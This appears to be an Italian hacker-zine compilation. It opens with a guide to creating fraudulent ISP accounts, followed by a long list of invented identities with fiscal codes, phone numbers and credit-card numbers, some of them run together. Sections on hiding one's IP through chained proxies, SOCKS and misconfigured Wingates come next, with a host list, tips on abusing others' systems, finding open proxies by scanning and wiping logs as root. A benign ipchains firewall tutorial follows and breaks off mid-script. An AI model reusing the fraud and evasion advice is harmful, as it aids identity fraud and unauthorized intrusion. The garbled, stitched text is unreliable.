che abbiamo registrato con il nostro nome e i nostri dati anagrafici.
Da quando sono nati i free-internet provider (Libero,Tiscali) la situazione e'
alquanto migliorata (non che prima fosse fosse molto piu' complicata...); si
possono creare fake-account a volonta', utilizzando un generatore di
identita'(tipo quello di Cavallo de Cavallis).
Naturalmente per effettuare l'abbonamento on-line, si dovranno rispettare alcune
regole auree: una l'abbiamo gia' vista, ovvero la "
disabilitazione" del CLI
mettendo il numero 1793 prima del numero da chiamare, l'utilizzo di proxy.
Eccovi ad esempio una piccola lista di identita' false:
NOME Mathias
COGNOME Ghiringhelli
NATO IL 12 / 7 / 1965
A Porto Recanati (MC)
RESIDENTE IN Viale Liberazione 29
14036 Moncalvo (AT)
COD. FISCALE N. GHR MHS 65L12 G919A
CELLULARE N. (Omnitel Libero) 0347-1743221
CARTA DI CREDITO 4095 1244 6919 7921 (Banca : CARIPLO)
E-MAIL: mghiringhelli@...

NOME Diego
COGNOME Arrigoni
NATO IL 18 / 5 / 1958
A Lido di Camaiore (LU)
RESIDENTE IN Vicolo Adige 11
07041 Alghero (SS)
COD. FISCALE N. RRG DGI 58E18 B455O
CELLULARE N. (Tim EuroBasic) 0335-9990487
CARTA DI CREDITO 4095 8594 5337 9809 (Banca : CARIPLO)
E-MAIL: darrigoni@...

NOME Piero
COGNOME Bonfanti
NATO IL 15 / 7 / 1945
A Rapallo (GE)
RESIDENTE IN Vicolo Croce 30
22030 Lasnigo (CO)
COD. FISCALE N. BNF PRI 45L15 H183H
CELLULARE N. (Tim EuroTime) 0338-4408500
CARTA DI CREDITO 4095 7843 7643 1133 (Banca : CARIPLO)
E-MAIL: pbonfanti@...

NOME Alfredo
COGNOME Ghiringhelli
NATO IL 20 / 11 / 1976
A Alghero (SS)
RESIDENTE IN Piazza XXII Maggio 26
00152 Roma (ROMA)
COD. FISCALE N. GHR LRD 76S20 A192A
CELLULARE N. (Tim EuroProf.) 0335-4559612
CARTA DI CREDITO 4095 0501 1616 8025 (Banca : CARIPLO)
E-MAIL: aghiringhelli@...

NOME Giacomo
COGNOME Rigamonti
NATO IL 2 / 12 / 1959
A Lido di Camaiore (LU)
RESIDENTE IN Via Napoli 16
94010 Pergusa (EN)
COD. FISCALE N. RGM GCM 59T02 B455U
CELLULARE N. (Tim EuroFamily) 0338-7536369
CARTA DI CREDITO 4095 8849 8508 3620 (Banca : CARIPLO)
E-MAIL: grigamonti@...

NOME Maurizio
COGNOME Ferro
NATO IL 2 / 11 / 1962
A Turbigo (MI)
RESIDENTE IN Vicolo Adige 12
74100 Taranto (TA)
COD. FISCALE N. FRR MRZ 62S02 L471O
CELLULARE N. (Tim EuroFamily) 0338-9900884
CARTA DI CREDITO 4095 4057 1722 7069 (Banca : CARIPLO)
E-MAIL: mferro@...

NOME Gianpaolo
COGNOME Caputo
NATO IL 17 / 11 / 1969
A Conselve (PD)
RESIDENTE IN Via Roma 20
90018 Termini Imerese (PA)
COD. FISCALE N. CPT GPL 69S17 C964Q
CELLULARE N. (Tim EurNOME Emanuele
COGNOME Stefanucci
NATO IL 11 / 8 / 1954
A Varese (VA)
RESIDENTE IN Viale Liberazione 6
39100 Bolzano (BZ)
COD. FISCALE N. STF MNL 54M11 L682G
CELLULARE N. (Tim EurNOME Michele
COGNOME Macchi
NATO IL 2 / 9 / 1943
A Novi Ligure (AL)
RESIDENTE IN Piazza XXII Maggio 20
94010 Pergusa (EN)
COD. FISCALE N. MCC MHL 43P02 F965A
CELLULARE N. (Tim EuNOME Gianpaolo
COGNOME Cavallo
NATO IL 17 / 9 / 1961
A Novi Ligure (AL)
RESIDENTE IN Corso Trento 28
15067 Novi Ligure (AL)
COD. FISCALE N. CVL GPL 61P17 F965C
CELLULARE N. (Tim EuroTime) 0338-4491289
CARTA DI CREDITO 4095 3937 4466 3680 (Banca : CARIPLO)
E-MAIL: gcavallo@...

NOME Alessio
COGNOME Robustelli
NATO IL 15 / 12 / 1952
A Turbigo (MI)
RESIDENTE IN Via Palermo 9
55043 Lido di Camaiore (LU)
COD. FISCALE N. RBS LSS 52T15 L471C
CELLULARE N. (Tim EuroBasic) 0335-2338266
CARTA DI CREDITO 4095 2791 5001 5954 (Banca : CARIPLO)
E-MAIL: arobustelli@...

NOME Alex
COGNOME Balducci
NATO IL 26 / 10 / 1962
A Gravellona Toce (NO)
RESIDENTE IN Via MonteRosa 15
00152 Roma (ROMA)
COD. FISCALE N. BLD LXA 62R26 E153I
CELLULARE N. (Tim EuroFamily) 0338-8214080
CARTA DI CREDITO 4095 7009 5907 8497 (Banca : CARIPLO)
E-MAIL: abalducci@...

NOME Vittorio
COGNOME Brambilla
NATO IL 9 / 6 / 1977
A Bussolengo (VR)
RESIDENTE IN Via Cavour 6
42030 Marola (RE)
COD. FISCALE N. BRM VTR 77H09 B296X
CELLULARE N. (Tim EuroFamily) 0338-4466908
CARTA DI CREDITO 4095 6149 2925 1383 (Banca : CARIPLO)
E-MAIL: vbrambilla@...

NOME Gianni
COGNOME Beretta
NATO IL 7 / 12 / 1954
A Bologna (BO)
RESIDENTE IN Piazza del Popolo 24
94010 Pergusa (EN)
COD. FISCALE N. BRT GNN 54T07 A944W
CELLULARE N. (Tim EuroTime) 0338-1096466
CARTA DI CREDITO 4095 8643 9551 6476 (Banca : CARIPLO)
E-MAIL: gberetta@...

NOME Emanuele
COGNOME Perego
NATO IL 9 / 12 / 1964
A Bolzano (BZ)
RESIDENTE IN Largo C. Menotti 19
55043 Lido di Camaiore (LU)
COD. FISCALE N. PRG MNL 64T09 A952H
CELLULARE N. (Tim EuroProf.) 0335-2877290
CARTA DI CREDITO 4095 0129 6608 5030 (Banca : CARIPLO)
E-MAIL: eperego@...

NOME Francesco
COGNOME Crippa
NATO IL 17 / 4 / 1950
A Varese (VA)
RESIDENTE IN Piazza del Popolo 21
55043 Lido di Camaiore (LU)
COD. FISCALE N. CRP FNC 50D17 L682Z
CELLULARE N. (Tim EuroProf.) 0335-7766738
CARTA DI CREDITO 4095 3540 8807 5071 (Banca : CARIPLO)
E-MAIL: fcrippa@...

NOME Martino
COGNOME Pasqualin
NATO IL 6 / 5 / 1978
A Firenze (FI)
RESIDENTE IN Viale Milano 28
74100 Taranto (TA)
COD. FISCALE N. PSQ MTN 78E06 D612J
CELLULARE N. (Tim EuroTime) 0338-4969434
CARTA DI CREDITO 4095 6260 9662 6999 (Banca : CARIPLO)
E-MAIL: mpasqualin@...

NOME Franco
COGNOME Mastrandrea
NATO IL 2 / 4 / 1974
A Bussolengo (VR)
RESIDENTE IN Via Petrarca 25
90018 Termini Imerese (PA)
COD. FISCALE N. MST FNC 74D02 B296K
CELLULARE N. (Tim EuroBasic) 0335-5884229
CARTA DI CREDITO 4095 2873 4601 4047 (Banca : CARIPLO)
E-MAIL: fmastrandrea@...

NOME Giovanni
COGNOME Scotti
NATO IL 28 / 8 / 1968
A Porto Recanati (MC)
RESIDENTE IN Piazza della Repubblica 25
14036 Moncalvo (AT)
COD. FISCALE N. SCT GNN 68M28 G919W
CELLULARE N. (Omnitel Libero) 0347-2911167
CARTA DI CREDITO 4095 5486 7474 0267 (Banca : CARIPLO)
E-MAIL: gscotti@...

NOME Luigi
COGNOME Caputo
NATO IL 5 / 11 / 1951
A Cavallino (VE)
RESIDENTE IN Viale Liberazione 1
20029 Turbigo (MI)
COD. FISCALE N. CPT LGU 51S05 C377W
CELLULARE N. (Omnitel Libero) 0347-4615041
CARTA DI CREDITO 4095 5649 7814 7422 (Banca : CARIPLO)
E-MAIL: lcaputo@...

NOME Gianpaolo
COGNOME Martini
NATO IL 25 / 7 / 1965
A Gravellona Toce (NO)
RESIDENTE IN Via Alfieri 9
60022 CastelFidardo (AN)
COD. FISCALE N. MRT GPL 65L25 E153U
CELLULARE N. (Tim EuroBasic) 0335-2150700
CARTA DI CREDITO 4095 5496 7462 1432 (Banca : CARIPLO)
E-MAIL: gmartini@...

NOME Emanuele
COGNOME Grisetti
NATO IL 12 / 8 / 1971
A Villanovafranca (CG)
RESIDENTE IN Vicolo Croce 9
90018 Termini Imerese (PA)
COD. FISCALE N. GRS MNL 71M12 L987E
CELLULARE N. (Omnitel Libero) 0347-3864265
CARTA DI CREDITO 4095 9954 3804 7812 (Banca : CARIPLO)
E-MAIL: egrisetti@...

NOME Giulio
COGNOME Brambilla
NATO IL 10 / 10 / 1949
A Conselve (PD)
RESIDENTE IN Via Roma 11
50020 Romola (FI)
COD. FISCALE N. BRM GLI 49R10 C964P
CELLULARE N. (Tim EuroBasic) 0335-4530817
CARTA DI CREDITO 4095 3094 3583 1634 (Banca : CARIPLO)
E-MAIL: gbrambilla@...

NOME Alex
COGNOME Martini
NATO IL 27 / 1 / 1945
A Villanovafranca (CG)
RESIDENTE IN Via Petrarca 28
20029 Turbigo (MI)
COD. FISCALE N. MRT LXA 45A27 L987U
CELLULARE N. (Tim EuroFamily) 0338-9876733
CARTA DI CREDITO 4095 4099 0734 8313 (Banca : CARIPLO)
E-MAIL: amartini@...

NOME Massimo
COGNOME Rigoli
NATO IL 20 / 12 / 1977
A Pragelato (TO)
RESIDENTE IN Via Ragazzi del 99 7
06024 Gubbio (PG)
COD. FISCALE N. RGL MSM 77T20 G973G
CELLULARE N. (Tim EuroTime) 0338-6418805
CARTA DI CREDITO 4095 3913 8758 4668 (Banca : CARIPLO)
E-MAIL: mrigoli@...

NOME Francesco
COGNOME Arrigoni
NATO IL 22 / 5 / 1955
A Lido di Camaiore (LU)
RESIDENTE IN Largo Garibaldi 25
54037 Marina di Massa (MC)
COD. FISCALE N. RRG FNC 55E22 B455Z
CELLULARE N. (Tim EuroTime) 0338-3269732
CARTA DI CREDITO 4095 9731 2835 6173 (Banca : CARIPLO)
E-MAIL: farrigoni@...

NOME Matteo
COGNOME Chilin
NATO IL 27 / 10 / 1944
A Cavizzana (TN)
RESIDENTE IN Piazza Indipendenza 28
37012 Bussolengo (VR)
COD. FISCALE N. CHL MTT 44R27 C400J
CELLULARE N. (Tim EuroFamily) 0338-3238370
CARTA DI CREDITO 4095 9962 3277 3561 (Banca : CARIPLO)
E-MAIL: mchilin@...

NOME Pasquale
COGNOME Francisci
NATO IL 9 / 9 / 1977
A Turbigo (MI)
RESIDENTE IN Via Alfieri 28
06024 Gubbio (PG)
COD. FISCALE N. FRN PQL 77P09 L471B
CELLULARE N. (Omnitel Libero) 0347-9234489
CARTA DI CREDITO 4095 3731 3438 0699 (Banca : CARIPLO)
E-MAIL: pfrancisci@...

NOME Silvano
COGNOME Ferrazzi
NATO IL 11 / 7 / 1968
A Porto Recanati (MC)
RESIDENTE IN Via Palermo 6
22030 Lasnigo (CO)
COD. FISCALE N. FRR SVN 68L11 G919A
CELLULARE N. (Tim EuroTime) 0338-3385695
CARTA DI CREDITO 4095 3146 8614 2038 (Banca : CARIPLO)
E-MAIL: sferrazzi@...

NOME Stefano
COGNOME Rigamonti
NATO IL 27 / 12 / 1948
A Porto Recanati (MC)
RESIDENTE IN Via Alfieri 30
56030 Selvatelle (PI)
COD. FISCALE N. RGM SFN 48T27 G919T
CELLULARE N. (Tim EuroProf.) 0335-3831646
CARTA DI CREDITO 4095 1351 4903 8293 (Banca : CARIPLO)
E-MAIL: srigamonti@...

NOME Andrea
COGNOME Ferro
NATO IL 2 / 5 / 1949
A Pragelato (TO)
RESIDENTE IN Piazza XXII Maggio 7
06024 Gubbio (PG)
COD. FISCALE N. FRR NDR 49E02 G973S
CELLULARE N. (Tim EuroBasic) 0335-1164522
CARTA DI CREDITO 4095 5097 0999 1911 (Banca : CARIPLO)
E-MAIL: aferro@...

NOME Alessandro
COGNOME Brusoli
NATO IL 23 / 6 / 1942
A Alghero (SS)
RESIDENTE IN Via Isonzo 5
60022 CastelFidardo (AN)
COD. FISCALE N. BRS LSN 42H23 A192M
CELLULARE N. (Tim EuroBasic) 0335-6473458
CARTA DI CREDITO 4095 5952 2036 6360 (Banca : CARIPLO)
E-MAIL: abrusoli@...

NOME Oscar
COGNOME Fanton
NATO IL 4 / 2 / 1950
A Bologna (BO)
RESIDENTE IN Vicolo Mazzini 3
50014 Fiesole (FI)
COD. FISCALE N. FNT SCR 50B04 A944G
CELLULARE N. (Tim EuroTime) 033NOME Giacomo



0x00.3 Proxy
------------
Uno dei problemi principali del newbie e del wannabe e' come nascondere o
cambiare il proprio ip durante la navigazione o per entrare in IRC.
I browser (Explorer, Netscape) prevedono l'uso di "
proxy", ovvero computer che
si frappongono tra noi e il resto della rete; quando cerchiamo di recuperare
una pagina sul web, il nostro browser contattera' il proxy, e sara' quindi
quest'ultimo a "
prelevare" il documento html e a inviarlo a noi; vantaggio di
questa operazione e' che l'ip loggato dal server di destinazione (dove
abbiamo prelevato la pagina) sara' quello del proxy e non il nostro.
Attenzione pero': non tutti i proxy sono anonimi. Questo significa che in alcuni
casi il proxy lascia "
filtrare" il nostro ip reale che restera' nei log del
server. Prima di usare un proxy, ci si doverebbe sempre assicurare che si tratta
di un proxy anonimo che non rivela il nostro ip. Questo testo puo' essere
effettuato collegandosi a http://www.anonymizer.com/snoop.cgi, una pagina
che fa un test sul grado di anonimato del nostro sistema.
Comunque anche utilizzando un proxy anonimo non vi dovete sentire sicuri, anzi.
Sarebbe opportuno concatenare due o piu' proxy prima di collegarsi al vero
obbiettivo. Come ? Innanzitutto questa tecnica funziona solo con alcuni tipi
di proxy, i Delegate; quando avete trovato alcuni Delegate, dovete mettere
nella barra del browser la seguente stringa:
http://proxy1.url:port/-_-http://proxy2.url:port/-_-
dove proxy1,proxy2 e proxy3 sono gli indirizzi dei proxy Delegate che avete trovato.
Ricordate: piu' proxy mettete, piu' diminuiscono le probabilita' di essere
rintracciati, ma aumenta anche il tempo di latenza, rallentando la
navigazione.
Ma anche i proxy loggano...
Io vi consiglio di concatenare quanti + possibili proxi, in rete trovate una lista
completa di migliaia di server, esempio (porta 8088):

proxy.sce.com
proxy.speedware.com
proxye1-atm.elp.rr.com
proxye1-atm.maine.rr.com
proxye2-atm.elp.rr.com
209.20.42.6
210.131.240.3
210.140.48.2
210.145.39.211
210.160.178.46
210.161.225.164
210.163.132.10
210.170.69.146
proxy3.emirates.net.ae
proxyf.emirates.net.ae
proxye3-atm.elp.rr.com
proxye3-atm.maine.rr.com
proxye4-atm.elp.rr.com
proxye4-atm.maine.rr.com
proxye2-atm.nycap.rr.com
proxye2-atm.san.rr.com
proxye3-atm.nycap.rr.com
proxye3-atm.san.rr.com
proxye4-atm.nycap.rr.com
proxye4-atm.san.rr.com
proxyi.emirates.net.ae
proxyj.emirates.net.ae
proxyk.emirates.net.ae
proxy4.emirates.net.ae
cache02.netway.at
www-proxy.tecan.co.at
basil.acr.net.au
proxy.gwbbs.net.au
proxy.newave.net.au
cvs2.kyunghee.ac.kr
www.pt.lu
proxyone.cowles.com
relay1.kemmunet.net.mt
proxy.vt.com
tenaga.tnb.com.my
proxy2.lsil.com
cache-1.golden.net
titan.datainternet.com
cache2.bora.net
be3334.schering.de
proxy.golden.net
bibo.fz.uni-lueneburg.de

E dopo la lista eccovi un bel URL che vi interesserà sicuramente :
http://tools.rosinstrument.com/proxy/

0x00.4 Socks
------------
Nelle reti protette da firewall gli host interni entrano in Internet attraverso
un servizio speciale: Socks.
Questo protocollo la cui porta di default e' la 1080, permette alle applicazioni
che lo supportano di collegarsi a Internet in modo indiretto, con il firewall
che fa da tramite. Il principio e' lo stesso del proxy per http, ma il range
di applicazioni e' piu' vasto. In pratica ogni applicazione che supporta Socks,
puo' collegarsi a Internet tramite Socks. Il vantaggio e' come al solito che
l'ip che appare non e' piu' il nostro ip reale, ma quello del firewall; inoltre
nuke & DoS vari del lamer di turno saranno diretti al firewall, lasciando
del tutto indifferente la nostra macchina!
L'utilizzo dei Socks e' classico nel mondo di IRC, ma puo' essere utilizzato
anche con altre applicazioni; Volete proprio usare il Netbus? Ok, ma almeno
non fatevi beccare subito con il vostro ip vero... usate un Socks. Volete
fare del port-surfing manuale con il Telnet? Usate Socks...
Certo, non tutti i programmi prevedono l'uso di Socks (per esempio, il Telnet di
serie di Windows non lo supporta), ma grazie a un programma tipo SocksCap si
puo' fare in modo che TUTTI i programmi di rete (compreso il Telnet standard di
Windows) possano collegarsi in modo "
anonimo". In questo modo e' possibile
anche inviare email tramite Outlook o Eudora senza la paura di esporre il
nostro ip reale, ma quello per esempio di un computer del governo di Taiwan...

0x00.5 Wingate
--------------
Wingate e' un porgramma per Windows che permette di collgare piu' macchine
tramite una sola connesisone Internet, tramite le funzioni di proxy http,
Socks, proxy ftp, telnet...
In Internet si trovano molti Wingate mal configurati che permettono l'accesso
anche a utenti non autorizzati (noi!). Il meccanismo e' quello visto il precedenza
per i proxy e i Socks (ovvero l'ip che viene lasciato in giro e'quello del
Wingate e non il nostro), ma ha una modalita' di utilizzo diversa.
Lanciate il Telnet e collegatevi alla porta 23 del Wingate, se tutto e' Ok
avrete un prompt del genere:
Wingate>
a questo punto mettete l'indirizzo dell'host al quale vi volete collegare, segutio
dal numero di porta:
Wingate>bill.whitehouse.gov 23 (Naturalmente sto scherzando: lasciate stare i
.gov...)
a questo punto il vostro ip e' al sicuro (relativamente, come sempre).
Anche nel caso dei Wingate e' buona norma concatenare piu' Wingate tra di
loro, cosi:
quando avete il prompt del Wingate (Wingate>) inserite l'indirizzo di un altro
Wingate,e poi un altro... infine l'indirizzo dell'host da attaccare.
Certo aumenta il lag, ma e' sempre meglio che andare in galera...

0x00.6 Trovare Proxy, Socks & Wingate
-------------------------------------
Altro problema annoso del novello "
hacker": dove li trovo i proxy & i Wingate ?
Esistono diversi modi per procurarsi questi indirizzi. Il piu' immediato
(e il meno redditizio) e' quello di andare su uno di quei siti che pubblicano
liste di proxy e socks (proxy4all.cgi.net, la sezione apposita in
www.cyberarmy.com e altri...). Il problema e' che questi proxy durano pochissimo
o non funzionano affatto... Conviene arrangiarsi in altro modo.
Procuriamoci uno scanner e lanciamolo in giro x la rete, prima o poi qualcosa
troviamo.

Per informazione, le porte su cui trovare qualcosa sono le seguenti:
8080 proxy http
3128 proxy http
81 proxy http
1080 Socks

Un altro modo efficace x trovare Socks e' quello di entrare in IRC e dare il
comando
/stats k
per avere la lista dei k-line, ovvero la lista di host "
bannati". Molti host
della lista saranno Socks bannati da quel server ma perfettamente funzionanti
x altri scopi!

Siete pigri e non avete voglia di cercare? Aspettate che i Socks vengano a voi!
Lanciate il Nukenabber e navigate tranquillamente (oppure andate su un canale
molto frequentato in IRC); Alla fine della serata date uno sguardo al log del
Nukenabber: tra i vari tentativi di lamer con BO & Netbus, forse ci sara' anche
qualche indirizzo di Socks utilizzabile...

Altre tecniche potete trovarle nel mio articolo "
Gabole nella Rete", reperibile
sul mio sito e sul numero 0 di "
Lightz".

0x00.7 Pericoli
---------------
Per iniziare bisogna dire che NESSUNA tecnica qui esposta garantisce l'anonimato
assoluto, esiste sempre un margine di pericolo.
Dal momento della connessione dial-up con il provider alla connessione tramite
TCP/IP in Internet, lasciamo un mare di tracce ovunque.
La compagnia telefonica ha sempre e comunque il nostro vero numero, anche se
usiamo il BIC. I vari proxy che usiamo molto probabilmente (anzi, sicuramente)
loggano tutto il traffico, cosi'come i Socks: forse c'e' qualche speranza con
i Wingate. Assolutamente da evitare gli host "
boservizzati" o cmq "trojanizzati".
Forse il metodo piu' sicuro e' quello di essere root su di un sistema e avere la
la possibilita' di "
ripulire" per bene i log.
Da non dimenticare poi la possibilita' di mettere nei guai gli ignari possessori
di host compromessi (ancora una volta: trojan e backdoor varie) o i responsabili
dei sistemi che usiamo per "
rimbalzare" (Wingate, proxy...).







sYn -testo adattato- <---w w w . h a c k e r s a t . c o m---><---syn@hackersat.com--->



ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø GUIDA PRATICA ALL'USO DI IPCHAINS ø
ø kEwL ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø


Guida Pratica all’Uso di ipchains
By Ghost Rider
Tradotto da kEwL` <kewl@penguinpowered.com>

Introduzione
Come puoi vedere nel titolo, questa è una guida pratica, così puoi mettere da parte tutti
quei dubbi tecnici. Il mio obiettivo è di fornire delle informazioni alle persone normali
che non sanno dove cominciare nel settare un firewall con ipchains sul loro computer o sul-
la LAN. Prendi qualcosa da mangiare e un po’ di caffè e comincia a scalare la collina,
ehm...teso.
Cominciamo a leggere qualcosa di utile, ok?

Basi necessarie

Policy di Rete
La prima che devi pensare è che policy vuoi usare [per policy si intende un metodo da uti-
lizzare nell’installare il firewall...se continui a leggere ti sarà più chiaro]. Ci sono due
tipi di policy, il policy Accetta e il policy Rifiuta. Nel policy Accetta tutto quello che
non è specificato per rifiutare sarà accettato, altrimenti nel policy Rifiuta tutto sarà
rifiutato, tranne quello che hai escluso.
Nella mia opinione il policy migliore è il policy rifiuta, poiché devi solo aggiungere i
servizi che non vuoi dare, e tutto il resto sarà rifiutato. Il policy accept potrebbe aver
bisogno di alcuni rules di filtro, poiché devi specificare tutto quello che non vuoi bloc-
care.

Chains e Rules
Se non sai per cosa stanno queste due parole, avrai problemi a capire il funzionamento di
ipchains.

Chains
Ci sono 4 tipi di chains; focalizziamo sui primi 3 così puoi capire cos’è un chain. Quando
un pacchetto sta cercando di entrare nell’interfaccia di rete, esso passerà attraverso il
chain input; se il pacchetto sta cercando di uscire dall’interfaccia di rete, esso passerà
attraverso il chain output; se il pacchetto sta cercando di "
saltare" da un’interfaccia
ad un’altra passerà attraverso il chain forward. Quello che sto cercando di dire è questo:

- Quando un pacchetto cerca di accedere alla nostra rete dovrà passare attraverso il chain
input;
- Quando un pacchetto cerca di lasciare la nostra rete dovrà passare attraverso il chain
output;
- Quando un pacchetto cerca di saltare da un’interfaccia ad un’altra (se non capisci questa
parte, immagina l’ip forward, è realizzato in questo chain) dovrà passare attraverso il
chain forward.
Il 4° chain è il chain definito dall’utente, dove puoi creare il tuo chain.

In ognuno di questi chains dovrai definire che policy userai. Ci sono 3 possibili policy:

Per usare il policy accetta userai il policy ACCEPT.
Per usare il policy rifiuta puoi usare i seguenti policy:
- DENY
- REJECT

Qual è la differenza tra questi due policy?
Se usi il policy DENY i pacchetti che non sono permessi saranno scartati dal kernel, senza
riferire all’host remoto che il pacchetto è stato scartato. Questo è buono, perché il tuo
sistema non spreca risorse, e non farà vedere all’host remoto che il pacchetto è stato ri-
fiutato, e questo è positivo soprattutto se c’è qualcuno che sta cercando di hackare il tuo
sistema.
Se usi il policy REJECT, i pacchetti che non sono permessi saranno anche scartati ma verrà
generato un errore ICMP generato dal kernel e mandato all’host remoto. Questo ridurrà le
risorse di sistema, che ruberanno molto tempo.
Il mio consiglio è di usare il policy DENY al posto del REJECT. Ci sarà un’eccezione ma ne
parleremo più tardi.

Rules
Abbiamo parlato dei chains, ma solo i chains non filtrano i pacchetti, i chains hanno solo
i policy. I rules controllano il flusso dei pacchetti attraverso i chains. Possiamo vedere
un rule come un gruppo di condizioni e un obbiettivo. Il gruppo di condizioni è usato per
confrontare solo un tipo di pacchetti, l’obbiettivo definirà cosa succederà ai pacchetti
che confronterà il gruppo di condizioni.
Nei rules puoi anche usare ACCEPT, REJECT e DENY. Questo accetterà, respingerà (REJECT) o
rifiuterà (DENY) i pacchetti che coincidono con le condizioni di quei rules, e in questo
caso il policy del chain non influenzerà, poiché c’è un rule apposta per quel pacchetto.
Se non c’è un rule per il pacchetto, sarà applicato ad esso il policy del chain.
Il mio consiglio è di usare sempre DENY, perché non spreca le risorse del sistema come fa
REJECT. Ma ricorda che se ti stai connettendo a SMTP, aggiungi un rule REJECT alla porta
113 (auth). Perché? Perché quando ti connetti al server SMTP, il server remoto cercherà di
connettersi alla tua porta auth per sapere chi sei, e se metti DENY il pacchetto sarà scar-
tati "
silenziosamente" così il server SMTP aspetterà fino al timeout per procedere, e
questo può impiegare circa 1 o 2 minuti. Così se setti il rule REJECT alla porta 113, quan-
do SMTP cerca di connettersi riceve un errore e procederà senza dover aspettare.
È meglio vero?
L’ultima cosa che dovresti sapere sui rules è che verrà verificato il primo rule, e il pro-
cesso verrà bloccato per quel pacchetto. Questo significa che se prima hai detto di blocca-
re tutte le porte da 10 a 100 e nel rule dopo permetti la connessione alla porta 22, il se-
condo rule non avrà effetto perché la 22 è compresa tra la 10 e la 100, e così solo il pri-
mo sarà valido.

Ora parleremo dell’ultima cosa in questa sezione e cominceremo con i comandi ipchains per
costruirci il nostro firewall. Bello vero?
E l’ultimo argomento è ...(rullo di tamburi)...

Ip e Masking
Perché masking [letteralmente mascherare]? Perché il masking può essere molto utile nei ru-
les. Se qualcuno di voi ha detto perché masking, qualcun altro ha detto cos’è il masking?

Poiché l’argomento masking potrebbe occupare un intero documento, o anche un libro, ripor-
terò un brevissimo riassunto che sarà sufficiente per farti capire come funziona.
Un indirizzo IP è costruito di 4 campi, ognuno separato dall’altro con un punto. Esempio:

IP: 193.34.13.15 - questo IP può anche essere scritto
11000001.00100010.00001101.00001110

In un IP alcuni di questi campi rappresentano la mask di rete e il resto di esso rappresen-
tano la host mask.
Il masking ci dice quanti bit sono fissati, e quanti non lo sono. Questo significa che
0.0.0.0/0 può significare ogni indirizzo IP, e 134.34.12.12/32 può significare solo
134.34.12.12 ma 134.34.12.0/24 può significare gli IP da 134.34.12.0 a 134.24.12.255.

Il segreto per capire ciò è pensare gli ip in forma binaria e non decimale.

Bene penso che siete preparati per cominciare con ipchains. Che ne dite? Cominciamo?

Ipchains: Finalmente!!!

Penso che il miglior modo di parlare della sintassi di ipchains e delle configurazioni è
scrivere uno script ipchains. Ci saranno due scripts, uno per lo il computer standalone
(che sta da solo) e un altro per un firewall che coprirà un’intera rete. Ci saranno i com-
menti così potete capire.

---- Lo script comincia quì ---

#!/bin/bash

# ipchains script scritto da Ghost_Rider
# usato come esempio in Guida Pratica all’Uso di ipchains


IPCHAINS ="
/sbin/ipchains"


# Per prima cosa scriveremo tutti i rules. Questo ci assicurerà che i vecchi rules che
# possono essere qui non sono usati altrove.

$IPCHAINS -F input
$IPCHAINS -F output
$IPCHAINS -F forward


# Ora settiamo i policy.
# Il policy Deny per input e forwarding (questo sarà un computer standalone)
# Policy Access per output
# Nota: il policy deve essere in maiuscolo altrimenti non funzioneràrk

$IPCHAINS -P input DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P forward DENY


# Tutto il traffico localhost sarà accettato così aggiungiamo la seguente linea

$IPCHAINS -A input -i lo -j ACCEPT

# Questo significa:
# -A: aggiunge un rule al chain, in questo caso il chain input
# -i: dice che interfaccia filtrare, in questo caso lo (loopback), questo significa il
# traffico localhost
# -j: dice cosa fare con il pacchetto (policy del rule)


# Permettiamo ai pacchetti con connessioni stabilite di procedere.
# Quello che fa è controllare se il pacchetto ha il flag syn, perciò mettiamo ! -y che sta
# per negazione di -y
# Ma questa richiesta può essere falsificata. Non è difficile costruire il pacchetto.

$IPCHAINS -A input -i ppp0 -p tcp ! -y -j ACCEPT


# ppp0: è l’interfaccia di connessione ppp
# -p: sceglie il protocollo per quel rule, in questo caso tcp
# -y: controlla se i pacchetti hanno il flag syn o no.
# !: nega l’opzione, in questo caso -y


# Accettiamo le risposte DNS

$IPCHAINS -A input -i ppp0 -p tcp -sport 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p udp -sport 53 -j ACCEPT

# Permettiamo le connessioni a ssh

$IPCHAINS -A input -i ppp0 -p tcp --dport 22 -j ACCEPT


# --dport: dice la porta di destinazione, in questo caso la 22
# puoi anche usare --sport per la porta sorgente (porta dalla macchina remota).

# Respingiamo la connessione auth
# Se non sai perché stiamo facendo ciò, rileggi la sezione rule.

$IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT


# Permettiamo alcuni tipi di ICMP.
# il tipo 0 è echo reply (così puoi ricevere le risposte dei ping che mandi)
# il tipo 3 è Destination Unreachable (così non devi aspettare i timeout)
# il tipo 11 è Time Exceed (usato per il traceroute)


$IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT

# NOTA: probabilmente stai pensando "
perché metto le porte destinazione se icmp non ha
# porte?"
# Bene se osservi bene, il --dport specifica il tipo di icmp.
# Sì...In ipchains il --dport quando il protocollo è icmp chiama il tipo icmp. Non
# dimenticarlo.


# Ora vediamo tutto quello che ci colpisce e loggiamolo.

$IPCHAINS -A input -j DENY -l

# Come hai letto nella sezione rule il primo che confronta vince e l’analisi degli altri
# rule non verrà fatta. Così quello che facciamo qui è se il pacchetto che ci ha colpito
# non è stato accettato dagli altri rules, è perché è qualcosa che vogliamo rifiutare ma è
# meglio loggare e quindi usiamo l’opzione -l
# Se non vuoi loggare questi pacchetti non hai bisogno di mettere questo rule, poiché il
# policy di chain inuput è DENY così il pacchetto sarà scartato, ma non loggato.


--- Lo script finisce quì -----

Ora vediamo uno script di un firewall che sarebbe anche per una macchina per l’ip masquera-
ding.
Alcuni rules non avranno commenti dettagliati come nel primo script poiché li hai già.
Facendo ciò sto supponendo che il firewall ha due interfaccie, la ppp0 che lo connette ad
internet e la eth0 che lo connette con la LAN.

---- Lo script comincia quì ----


# Script di ipchains scritto da Ghost Rider usato come esempio in
# Guida Pratica all’Uso di Ipchains


IPCHAINS = "
/sbin/ipchains"

# Scriviamo i rules

$IPCHAINS -F input
$IPCHAINS -F output
$IPCHAINS -F forward


# Setta la policy
# input userà DENY
# output e forward userà ACCEPT

$IPCHAINS -P input DENY
$IPCHAINS -P output ACCEPT
